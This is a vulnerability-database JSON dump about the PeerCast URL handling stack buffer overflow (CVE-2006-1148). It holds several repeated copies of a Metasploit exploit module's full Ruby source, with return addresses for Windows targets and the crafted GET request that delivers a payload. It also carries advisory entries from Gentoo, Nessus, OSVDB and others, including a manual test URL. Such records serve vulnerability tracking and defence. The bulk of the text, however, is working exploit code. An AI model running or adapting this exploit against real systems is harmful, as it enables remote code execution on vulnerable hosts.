"2018-01-10T00:02:03", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. 
The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-14T22:10:23", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-14T22:10:23"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = 
[target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-14T22:10:23", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-15T14:15:19", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-15T14:15:19"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error 
within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-15T14:15:19", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. 
The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-16T10:14:26", "history": [], "viewCount": 1, "enchantments": {"score": {"value": null, "modified": "2018-01-16T10:14:26"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = 
[target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-16T10:14:26", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-17T00:12:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-17T00:12:08"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error 
within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-17T00:12:08", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. 
The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-22T01:07:08", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-02-22T01:07:08"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = 
[target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-02-22T01:07:08", "differentElements": ["modified", "published"], "edition": 14}], "viewCount": 1, "enchantments": {"vulnersScore": 5.5}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n 
register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}
{"result": {"cve": [{"id": "CVE-2006-1148", "type": "cve", "title": "CVE-2006-1148", "description": "Multiple stack-based buffer overflows in the procConnectArgs function in servmgr.cpp in PeerCast before 0.1217 allow remote attackers to execute arbitrary code via an HTTP GET request with a long (1) parameter name or (2) value in a URL, which triggers the overflow in the nextCGIarg function in servhs.cpp.", "published": "2006-03-10T06:02:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1148", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-20T10:49:09"}], "metasploit": [{"id": "MSF:EXPLOIT/LINUX/HTTP/PEERCAST_URL", "type": "metasploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-25T03:05:37"}], "openvas": [{"id": "OPENVAS:56545", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200603-17 (peercast)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200603-17.", "published": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=56545", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-24T12:50:17"}], "exploitdb": [{"id": "EDB-ID:16786", "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow Win32", "description": "PeerCast. CVE-2006-1148. 
Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16786/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-02T06:30:19"}, {"id": "EDB-ID:10027", "type": "exploitdb", "title": "PeerCast <= 0.1216", "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "published": "2006-03-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/10027/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-01T11:45:48"}, {"id": "EDB-ID:16855", "type": "exploitdb", "title": "PeerCast <= 0.1216 URL Handling Buffer Overflow linux", "description": "PeerCast. CVE-2006-1148. Remote exploit for linux platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16855/", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-02-02T06:40:34"}], "nessus": [{"id": "GENTOO_GLSA-200603-17.NASL", "type": "nessus", "title": "GLSA-200603-17 : PeerCast: Buffer overflow", "description": "The remote host is affected by the vulnerability described in GLSA-200603-17 (PeerCast: Buffer overflow)\n\n INFIGO discovered a problem in the URL handling code. 
Buffers that are allocated on the stack can be overflowed inside the nextCGIarg() function.\n Impact :\n\n By sending a specially crafted request to the HTTP server, a remote attacker can cause a stack-based buffer overflow, resulting in the execution of arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "published": "2006-03-23T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21124", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-10-29T13:35:50"}, {"id": "PEERCAST_01217.NASL", "type": "nessus", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "description": "The version of PeerCast installed on the remote host copies the supplied option string without limit into a finite-size buffer. An unauthenticated attacker can leverage this issue to crash the affected application and possibly to execute arbitrary code on the remote host subject to the privileges of the user running PeerCast.", "published": "2006-03-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=21041", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-11-24T09:26:09"}], "osvdb": [{"id": "OSVDB:23777", "type": "osvdb", "title": "PeerCast procConnectArgs() Function URL Handling Remote Overflow", "description": "## Vulnerability Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.1217 or higher, as it has been reported to fix this vulnerability. 
An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in PeerCast. The procConnectArgs() function fails to perform correct boundary checks on parameters passed in a URL, resulting in a stack-based overflow. With a specially crafted URL, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Manual Testing Notes\nhttp://[target]:7144/stream/?AAAAAAAAAAAAAAAAAAAAAAA....(800)\n## References:\nVendor URL: http://www.peercast.org/\n[Secunia Advisory ID:19169](https://secuniaresearch.flexerasoftware.com/advisories/19169/)\n[Secunia Advisory ID:19291](https://secuniaresearch.flexerasoftware.com/advisories/19291/)\nOther Advisory URL: http://www.peercast.org/forum/viewtopic.php?t=3346\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200603-17.xml\nOther Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0977.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0722.html\nGeneric Exploit URL: http://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-peercast.c\n[CVE-2006-1148](https://vulners.com/cve/CVE-2006-1148)\nBugtraq ID: 17040\n", "published": "2006-03-09T06:02:41", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:23777", "cvelist": ["CVE-2006-1148"], "lastseen": "2017-04-28T13:20:20"}], "gentoo": [{"id": "GLSA-200603-17", "type": "gentoo", "title": "PeerCast: Buffer overflow", "description": "### Background\n\nPeerCast is a Peer to Peer broadcasting technology for listening to radio and watching video on the Internet. \n\n### Description\n\nINFIGO discovered a problem in the URL handling code. Buffers that are allocated on the stack can be overflowed inside of nextCGIarg() function. 
\n\n### Impact\n\nBy sending a specially crafted request to the HTTP server, a remote attacker can cause a stack-based buffer overflow, resulting in the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll PeerCast users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/peercast-0.1217\"", "published": "2006-03-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200603-17", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-09-06T19:46:33"}], "packetstorm": [{"id": "PACKETSTORM:82238", "type": "packetstorm", "title": "PeerCast 0.1216 Buffer Overflow", "description": "", "published": "2009-10-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82238/PeerCast-0.1216-Buffer-Overflow.html", "cvelist": ["CVE-2006-1148"], "lastseen": "2016-12-05T22:12:48"}]}}